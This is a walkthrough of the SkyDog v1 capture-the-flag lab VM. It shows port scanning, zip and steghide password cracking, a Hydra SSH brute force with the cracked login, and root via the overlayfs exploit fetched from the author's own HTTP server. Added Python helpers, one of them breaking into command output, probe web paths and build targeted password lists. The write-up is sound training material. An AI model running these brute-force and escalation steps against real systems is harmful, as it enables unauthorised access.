SkyDog v1

Here we go again... let the cursing, late nights, frustration and fun begin.

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

So let's roll up our sleeves, make a pot of coffee and get started. A quick sweep of the local network with nmap reveals our target for this VM:

# nmap -sn 192.168.1.0/24
Nmap scan report for skydogctf.home (192.168.1.86)
Host is up (0.0018s latency).
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC)

Okay, now we have our target in sight, let's see what we have to work with:

# nmap -A 192.168.1.86

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-06 17:59 EDT
Nmap scan report for skydogctf.home (192.168.1.86)
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A quick look at http://192.168.1.86 doesn't show much, just the following SkyDogCon_CTF.jpg image. At least I don't think it's much, and a basic exif view hasn't turned up anything interesting. Maybe the image has something hidden in there, but at this stage I'll assume not and move along.

My interest is currently in the open ssh port (tcp/22) and the paths listed in the robots.txt file, so let's start digging and see what we can find. I've opened the robots.txt file and we have our first flag as a comment at the top of the file. I see how this is going to work, sneaky SkyDog:

# Congrats Mr. Bishop, your getting good – flag{cd4f10fcba234f0e8b2f60a490c306e6}

Okay, my initial thought at this stage is that the robots.txt file contains every cat and dog from around the neighbourhood to throw me off the trail. It seems suspicious, so I'll come back to it in a second. On a side note, I did a quick version check of port 22 and got the following:

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

I'm trying a couple of things currently which I'll come back to and explain if they lead anywhere, but while I was reviewing the .jpg I ran steghide to see if there was any hidden data:

# steghide --extract -sf SkyDogCon_CTF.jpg

Given that a passphrase is prompted for, I manually tried a few regulars with no luck. My next idea is to take the robots.txt file from the http root, which seems excessively long, trim it down and see if it contains any keywords to brute force the jpg with. To do this I used a tool I'd come across on the Top-Hat-Sec forum called brute.pl.

I created a wordlist based off the entries in the robots.txt file with grep and cut, using '/' as the delimiter, and then ran this output against the jpg.

While this was running I gave myself a good kicking in the backside. What was I doing? Rule number 1: NEVER assume anything. Back to last night: my original basic exif view of the SkyDogCon_CTF.jpg file was obviously done in a moment of tiredness or laziness. I think I used one of those online versions. Point to note for the future: DON'T! While I'm waiting for brute.pl to do its thing, I rechecked the .jpg with exiftool and lo and behold, the output is below, with another flag revealed in the 'XP Comment' field: flag{abc40a2d4e023b42bd1ff04891549ae2}

skydog_exiftool

So looping back to my previously running steghide password brute force attempt, I got nothing. Yes there's a passphrase prompt, but I have no idea what the password is just yet. That's no biggie; these things are like a giant jigsaw and a new clue will rear its head and give me a nudge in the right direction. One thing I've learnt as well: never over-analyse these things. 9 times out of 10 the answer is wearing nothing but a wiener bell and dancing in the shadows.

So my next step is to take the robots file, create a list of URLs combining each entry with the target IP, and check which of them are real. There are so many in here that I'm pretty confident it's basically security through obscurity. So how can I do this? Well, this is my approach and, to be honest, I have no idea what I'm doing, so there will be better ways. NOTE FROM THE FUTURE: use DirBuster!!!

First I save the robots.txt locally, then I keep only the second and third slash-separated fields with cut (cat skydog_index.txt | cut -d "/" -f 2,3), using -s to drop any lines that don't contain a '/', and remove duplicates with sort -u. You could put this in a bash script, but I just combined it on a single line and ran it as follows:

# for url in $(cat skydog_index.txt | cut -d "/" -f 2,3 -s | sort -u); do wget http://192.168.1.86/$url; done

I don't know how to only output successful connections and hide the 404s, but given it's not that big I just did a quick scroll through rather than waste too much time. So here are the juicy bits we've got to work with going forward:

http://192.168.1.86/Setec/
Connecting to 192.168.1.86:80… connected.
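The same robots.txt-to-wordlist idea in a form that hides the 404s, as an added example written for this page rather than code from the original post. It parses the Disallow/Allow paths into a unique list at most two components deep (the equivalent of the cut -f 2,3 -s | sort -u pipeline), then requests each one and keeps only the responses that were not 404. The sample robots.txt is constructed; the target URL defaults to the VM's address and is an assumption you would override on the command line.

```python
#!/usr/bin/env python3
"""Turn a robots.txt into a directory wordlist and keep only the hits.

Added example (not code from the original post or from the VM author):
it does what the cut / sort -u / wget loop above does, then drops every
404 so only paths that actually exist are printed.
"""
import re
import sys
import urllib.error
import urllib.request
from typing import Iterable

# Constructed sample in the style of the Google-like robots.txt reported by
# nmap; the real file on the VM had about 252 entries and a flag comment.
SAMPLE_ROBOTS = """\
# Congrats Mr. Bishop, your getting good - flag{...}
User-agent: *
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /setnewsprefs?
Disallow: /?hl=*&
Disallow: /Setec/
Disallow: /Setec/Astronomy/
Allow: /mail/
"""


def robots_paths(text: str) -> list[str]:
    """Unique path prefixes from Disallow/Allow lines, at most two deep.

    Equivalent to `cut -d / -f 2,3 -s | sort -u`, except that entries
    containing a wildcard or a query string are skipped: they are never a
    real directory and only waste requests.
    """
    seen: set[str] = set()
    for line in text.splitlines():
        m = re.match(r"^(?:Disallow|Allow):\s*(/\S*)", line)
        if not m:
            continue
        parts = [p for p in m.group(1).split("/") if p][:2]
        if not parts or any("*" in p or "?" in p for p in parts):
            continue
        seen.add("/".join(parts))
    return sorted(seen)


def probe(base: str, paths: Iterable[str], timeout: float = 5.0) -> dict[str, int]:
    """Request each candidate and return {path: status} for non-404s.

    Assumes a plain-HTTP target such as http://192.168.1.86. A 403 is kept
    on purpose: it still proves the directory exists.
    """
    hits: dict[str, int] = {}
    for p in paths:
        url = f"{base.rstrip('/')}/{p}/"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                hits[p] = resp.status
        except urllib.error.HTTPError as e:
            if e.code != 404:
                hits[p] = e.code
        except urllib.error.URLError:
            pass  # unreachable or timed out: move on rather than crash
    return hits


if __name__ == "__main__":
    # usage: robots_probe.py http://192.168.1.86 [robots.txt]
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.86"
    text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_ROBOTS
    for path, code in sorted(probe(target, robots_paths(text)).items()):
        print(f"{code} {target.rstrip('/')}/{path}/")
```

Entries with a wildcard or query string are dropped because Apache will never serve them as a directory; if you want the exact behaviour of the one-liner, remove that filter. The wordlist this produces is also a reasonable starting input for DirBuster.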

Setec_Astronomy

Checking the source code of this page also turns up a clue, "NSA-Agent-Abbott"; AKA Darth Vader, a reference to James Earl Jones, who plays NSA Agent Bernard Abbott in the movie Sneakers. Also in that movie, "Setec Astronomy" is an anagram of "too many secrets". Still, not many bells ringing for me at this stage.

source of sectec

In a moment of madness I create a password list using CeWL from the Sneakers wiki page and another from the wiki page for James Earl Jones (example below), but I haven't done any morphing or mutating of the resulting text files:

# cewl -d 1 -m 4 -v -w jamesPW.txt http://en.wikipedia.org/wiki/James_Earl_Jones

That would be too easy, and as expected I failed yet again. But that's what this is all about: fail until you succeed, or put in a bit more effort, aka Try Harder!

Taking a step back and going back to the html source code, we can see that Setec_Astronomy.jpg is located in a subdirectory called ./Astronomy, so let's check that out:

Index of sectec.astronomy

I download Whistler.zip and try to unzip it. Fail, it's password protected, grrr. I can see it contains two files, Flag.txt and QuesttoFindCosmo.txt, but what to do now? Before I waste too much time creating various custom password lists I'll try running the standard rockyou.txt list against it with fcrackzip and see how I go:

yourmother

Finally – PASSWORD FOUND!!!!: pw == yourmother

We have Flag #3 Who Can You Trust? flag{1871a3c1da602bf471d3d76cc60cdb9b} = yourmother. And the QuesttoFindCosmo.txt file contains the following clue:

Time to break out those binoculars and start doing some OSINT

Looks like this challenge is about to exit the VM and enter the real world for a while. This could be interesting; let's see where we end up in the rabbit hole. Everything I think I've got to go on so far is:

The three flags
flag{cd4f10fcba234f0e8b2f60a490c306e6} = Bots
flag{abc40a2d4e023b42bd1ff04891549ae2} = Welcome Home
flag{1871a3c1da602bf471d3d76cc60cdb9b} = yourmother

“NSA-Agent-Abbott”; AKA Darth Vader a potential reference to James Earl Jones who plays NSA Agent Bernard Abbott in the movie Sneakers

The zip file called Whistler – possibly a reference to the Sneakers character Irwin ‘Whistler’ Emery

A text file named QuesttoFindCosmo.txt, or "Quest to Find Cosmo": another character in Sneakers, Cosmo, played by Ben Kingsley.

Maybe one of the remaining three flags hold a clue for the next step?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

I’m stuck with two stego images that I need passwords for and two ports open on the target (22 and 80) that I could do more with

Okay, so what have I been doing for the last 24 hours, when I wasn't at work that is? I tried a multitude of brute force attacks on the .jpg files, first using brute.pl, and then I moved to a new tool suggested and provided by TAPE in the THS forums: https://github.com/adaywithtape/stegbrute/blob/master/stegbrute.sh for brute forcing stego files. The password lists I used were created with CeWL and ripped from the wikis of James Earl Jones and Sneakers (the movie), and also from the screenplay of the Sneakers movie.

Anyway, loooong story short: a few beers, a bowl of popcorn, a session of GoT and endless patience later, I came to a dead end (for now) with the brute forcing, so I'll move on and come back with a fresh head later.

COMMENT FROM THE FUTURE: I think we all agree trying to solve these VulnHub VMs is about learning and growing. It would seem at this stage, and I could be wrong (it wouldn't be the first time and it most certainly won't be the last), that the two images I've been trying to brute force are most likely quite innocent. Why do I say this?

Firstly, I became suspicious and ran steghide --info on a "clean" jpeg image: even in the absence of any steganography you still get prompted for a passphrase, so the prompt on its own proves nothing. Oh dear. I think I just learnt a valuable and time consuming lesson. So what to do from here? I'm sure there are tools available for this which I'll look into, but technically every JPEG file has a header marker called "Start of Image" (SOI) and a trailer marker called "End of Image" (EOI): every JPEG starts with the bytes 0xFFD8 and ends with the bytes 0xFFD9.

A quick check of my jpeg files in a hex editor confirms this: nothing follows the EOI marker, so nothing has simply been appended to the images. (That only rules out appended data; steghide itself embeds in the JPEG's DCT coefficients and leaves the trailer intact, so a clean trailer cannot prove a file is steghide-free.) I slowly hang my head, reflect on a lesson learnt and plan my next move. You can also check for any extra content after the EOI marker with the following; note that hexdump -C prints a double space after the eighth byte of each line, so a plain search for "ff d9" misses the marker when it straddles that gap or a line break:

# hexdump -C image.jpg | less +/"ff d9"
# hexdump -C image.jpg | more +/"ff d9"
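A byte-level version of the same SOI/EOI check, as an added example (not code from the original post). It locates the last FF D9 in the file and reports anything after it, which is what the hexdump search is looking for, and it does not suffer from the column-gap problem. The sample bytes it builds are a constructed stand-in for a JPEG, not a real picture; they include an Exif-style thumbnail with its own SOI/EOI pair to show why the last EOI, not the first, is the one that matters. Keep in mind what this proves: a clean trailer rules out appended data only, and a steghide-carrying file passes this check.

```python
#!/usr/bin/env python3
"""Find data appended after a JPEG's End-of-Image marker.

Added example (not code from the original post). A JPEG starts with the
SOI marker FF D8 and its image data ends with the EOI marker FF D9; any
bytes after the last FF D9 are foreign to the image and a classic place
to append a hidden file. Working on the raw bytes avoids the gap in the
hexdump approach above, where "ff d9" is missed when hexdump -C prints
the two bytes across its middle column gap or a line break.
"""
import sys

SOI = b"\xff\xd8"
EOI = b"\xff\xd9"


def trailer_length(data: bytes) -> int:
    """Number of bytes after the last EOI marker.

    The last EOI is used deliberately: an Exif APP1 segment can carry an
    embedded thumbnail with its own SOI/EOI pair, so the first FF D9 in
    the file is often not the end of the picture.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker FF D8")
    idx = data.rfind(EOI)
    if idx == -1:
        raise ValueError("no EOI marker FF D9: truncated file or not a JPEG")
    return len(data) - (idx + len(EOI))


def appended_data(data: bytes) -> bytes:
    """The bytes that follow the image, or b'' if the trailer is clean."""
    n = trailer_length(data)
    return data[-n:] if n else b""


def build_sample(trailer: bytes = b"") -> bytes:
    """Constructed stand-in for a JPEG (not a valid picture): SOI, an APP1
    segment holding a tiny 'thumbnail' with its own SOI/EOI, a dummy scan
    segment, the real EOI, then whatever we want to append."""
    thumb = SOI + b"\x00\x11\x22" + EOI
    app1_payload = b"Exif\x00\x00" + thumb
    app1 = b"\xff\xe1" + (len(app1_payload) + 2).to_bytes(2, "big") + app1_payload
    scan = b"\xff\xda\x00\x08" + bytes(range(8)) + b"\x12\x34\x56"
    return SOI + app1 + scan + EOI + trailer


if __name__ == "__main__":
    # usage: jpeg_trailer.py SkyDogCon_CTF.jpg  (no argument: run on the sample)
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_sample(b"constructed hidden payload")
    n = trailer_length(blob)
    print(f"{n} byte(s) after the last EOI marker")
    if n:
        print(appended_data(blob)[:64])
```

If the trailer is non-empty, run `file` on the extracted bytes: an appended zip, text file or second image usually identifies itself immediately.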

Chin up. I've now got this great list of Sneakers-related words, and the next step is to run the OWASP DirBuster app against http://192.168.1.86/ with my custom list and see what we can shake out of the bush. Two steps forward, one step back, but we're still making progress.

Bingo Bongo Bango, we have a new lead. I can see a new directory containing two new files:

http://192.168.1.86/PlayTronics/
http://192.168.1.86/PlayTronics/flag.txt
http://192.168.1.86/PlayTronics/companytraffic.pcap

A quick look at the new flag.txt file and we have the following flag{c07908a705c22922e6d416e0e1107d99}  = leroybrown

Next I fire up Wireshark and open our companytraffic.pcap file. Again, there will be faster and more efficient ways to do this, but I filtered by TCP stream and painfully checked each stream until I found something interesting: in this case TCP stream 45 is an HTTP GET request for an mp3 file. A quicker method is File > Export Objects > HTTP, where you'll see the audio/mpeg content and can download it directly.

Capture_companytrafficPCAP

Playing the audio file we hear the following recorded message “Hi, my name is Werner Brandes. My voice is my passport. Verify Me.” – Dr. Werner Brandes out of Sneakers.

I’ve also tried various checks of the sound file using exif readers and spectrum analysers to find any hidden information but with no luck at this stage so will move on for now. Yet again this is something completely new so will have to spend some more time on it if I can’t make progress elsewhere.

Well things are feeling okay, I’ve got 4 of the 6 flags, a cold beer and a new lease of energy as we look for flag number 5. I’ve done my dash with what I’ve got so now going to move my focus back to the VM and more specifically the open SSH port.

I took a stab last night running Hydra using my giant password list. The problem is, I have a very large list and no idea what the username might be; I took a guess at 'WernerBrandes'. One of the things I've learnt about wordlists is that there's a real skill in crafting them for a specific target, and while I like my current list, it's not efficient. So I'm going to create a short, un-mutated list that can be used both as the username input and as the password list, based specifically on the clues and flags I've found so far plus a couple of default usernames.

I’m hanging out for pizza and a beer so this needs to work. I’ll have another try using Hydra to crack the ssh login with my new simplified but specific list.

# hydra -t 5 -V -f -L ssh_list.txt -P ssh_list.txt 192.168.1.86 ssh

Oh..
my…
gosh…
I just pee’d myself a little. Finally something paid off!! I don’t know how long it took as I just left it running, but based on my wordlist above it was finally cracked at 1000 of 1444 possibilities.

[ATTEMPT] target 192.168.1.86 - login "wernerbrandes" - pass "leroybrown" - 1000 of 1444 [child 1]

[22][ssh] host: 192.168.1.86 login: wernerbrandes password: leroybrown
[STATUS] attack finished for 192.168.1.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
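A generator for that kind of short, clue-driven list, as an added example; it is not the author's ssh_list.txt, which is not reproduced on the page. The character names and phrases come from the write-up; the default usernames, the "sneakers" entry and the numeric suffixes are my assumptions. The point it demonstrates is that a few dozen login-style variants of each clue cover the combinations people actually choose, which is why a list like this beats a multi-thousand-word CeWL dump against a single account.

```python
#!/usr/bin/env python3
"""Build a short, targeted username/password list from the clues found so far.

Added example, not the author's own list (which is not reproduced on the
page). It generates the login-style variants of each name and clue word,
the kind of small list that cracked the SSH login far faster than the
big CeWL dumps did. The year suffix, the default usernames and the
"sneakers" entry are my assumptions, not anything the VM disclosed.
"""

# Clues taken from the write-up: characters, flag values and key phrases.
PEOPLE = ["Werner Brandes", "Martin Bishop", "Gunter Janek", "Cosmo"]
WORDS = ["bots", "welcome home", "yourmother", "leroybrown",
         "setec astronomy", "too many secrets", "sneakers"]
DEFAULT_USERS = ["root", "admin", "ubuntu", "nemo"]   # nemo: seen in /home
SUFFIXES = ("", "1", "123", "!", "2016")               # assumption


def _dedupe(items):
    """Keep the first occurrence and preserve order (sort -u would reorder)."""
    seen = set()
    return [x for x in items if not (x in seen or seen.add(x))]


def name_variants(full_name: str) -> list[str]:
    """'Werner Brandes' -> wernerbrandes, werner.brandes, werner_brandes,
    wbrandes, brandesw, werner, brandes, plus Capitalised and UPPER forms."""
    parts = full_name.lower().split()
    if len(parts) == 1:
        base = parts
    else:
        first, last = parts[0], parts[-1]
        base = [first + last, f"{first}.{last}", f"{first}_{last}",
                first[0] + last, last + first[0], first, last]
    return _dedupe(base + [b.capitalize() for b in base] + [b.upper() for b in base])


def word_variants(word: str) -> list[str]:
    """'welcome home' -> welcomehome, welcomehome1, ..., Welcomehome, WELCOMEHOME ..."""
    w = word.replace(" ", "")
    return _dedupe([f"{form}{s}" for form in (w, w.capitalize(), w.upper())
                    for s in SUFFIXES])


def build_lists() -> tuple[list[str], list[str]]:
    """Return (usernames, passwords). Every username is also tried as a
    password, which is what pointing hydra's -L and -P at the same file
    achieves; the separate password list then adds the clue words."""
    users = _dedupe(DEFAULT_USERS + [v for p in PEOPLE for v in name_variants(p)])
    passwords = _dedupe(users + [v for w in WORDS for v in word_variants(w)])
    return users, passwords


if __name__ == "__main__":
    users, passwords = build_lists()
    with open("ssh_users.txt", "w") as f:
        f.write("\n".join(users) + "\n")
    with open("ssh_pass.txt", "w") as f:
        f.write("\n".join(passwords) + "\n")
    print(f"{len(users)} users x {len(passwords)} passwords = "
          f"{len(users) * len(passwords)} attempts")
    print("hydra -t 4 -f -L ssh_users.txt -P ssh_pass.txt 192.168.1.86 ssh")
```

Keep the thread count low (-t 4 or so) against OpenSSH: the server's MaxStartups limit drops connections when too many unauthenticated sessions are opened at once, and hydra then reports failed attempts that were never actually checked.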

So I can now log on over ssh with my new credentials and do a quick check of the account and its rights with whoami and id:

screenshot_037

No surprises, I have limited rights, but a quick peek-a-boo into the local /home/wernerbrandes directory and we can see our next flag: flag{82ce8d8f5745ff6849fa7af1473c9b35} = Dr. Gunter Janek. I can also see another user on the system called nemo, and I'll now need to elevate my privileges.

First thing to do is check the current distro and kernel version to see if we have any options. Recon time!

$ cat /etc/issue && uname -a

Ubuntu 14.04.3 LTS \n \l
Linux skydogctf 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Well, this looks like familiar ground. Let's see if we can get something working here. Based on the distro and kernel, my first thought from previous experience is to try an overlayfs exploit again. But I hit a snag: the sneaky admin of this box has removed gcc, and after downloading an exploit I can't get it compiled on the target. I had a quick look for something in Python with no luck, so I have another idea.

A bit of a long shot, but on my Kali box I download and compile the exploit I want to use locally, in this case https://www.exploit-db.com/exploits/39166/. This works because the target is x86_64 (see the uname output above), so a binary built on a 64-bit Kali will run there as long as the target's glibc is compatible with what the binary was linked against; building with -static sidesteps that dependency entirely.

screenshot_038

Then I start up a quick session to share the current directory (and exploit file) using my new friend SimpleHTTPServer on port 80 with the following command

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

Back in my terminal with the ssh session to SkyDog, I grab the exploit with wget from my SimpleHTTPServer, make it executable with chmod and run it. Bingo!! Worked like a charm. A quick check and we have root.

screenshot_039

A quick search of the system with locate shows the last flag.txt file waiting patiently in the /root/BlackBox directory (locate only knows about files indexed by the last updatedb run, so run updatedb first if a recently placed file doesn't show up):

# cd /root/BlackBox
# cat flag.txt
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward. /CongratulationsYouDidIt

We quickly pop over to http://192.168.1.86/CongratulationsYouDidIt then celebrate like it’s 1984!! Job well done!

Big thank you to James Bower for putting in the time and effort on this VM and a tip of my hat to Grey-Matter over at the Top-Hat-Sec community for putting me on to SimpleHTTPServer. Every VM is a learning experience, so thank you all.

 

SHORT ON TIME? THEN HERE'S THE SUMMARY

Gameplay:

Enumerate target and services
Check exif data on web files
Check robots.txt
Find subdirectories in web
Bruteforce found zip file
Custom list from OSINT / CeWL
Dirbuster to find more web directories
Check source code of html pages
Analyse found pcap with Wireshark
Extract audio from stream
Custom wordlist from clues and key words
Bruteforce (Hydra) ssh connection
Escalate to root through Overlayfs exploit
Pillage and capture hidden flags along the way

Exploits used:

CVE-2015-1328 Overlayfs Local Root

Websites, Tools and Commands Used:

https://www.exploit-db.com
nmap
locate
CeWL
steghide
brute.pl
SimpleHTTPServer
gcc
chmod
fcrackzip
dirbuster
grep
cut
ssh
hexdump
Wireshark
hydra
python
wget
steganography

Flags:

flag{cd4f10fcba234f0e8b2f60a490c306e6} = Bots
flag{abc40a2d4e023b42bd1ff04891549ae2} = Welcome Home
flag{1871a3c1da602bf471d3d76cc60cdb9b} = yourmother
flag{c07908a705c22922e6d416e0e1107d99} = leroybrown
flag{82ce8d8f5745ff6849fa7af1473c9b35} = Dr. Gunter Janek
flag{b70b205c96270be6ced772112e7dd03f} = ?

8bit kiwi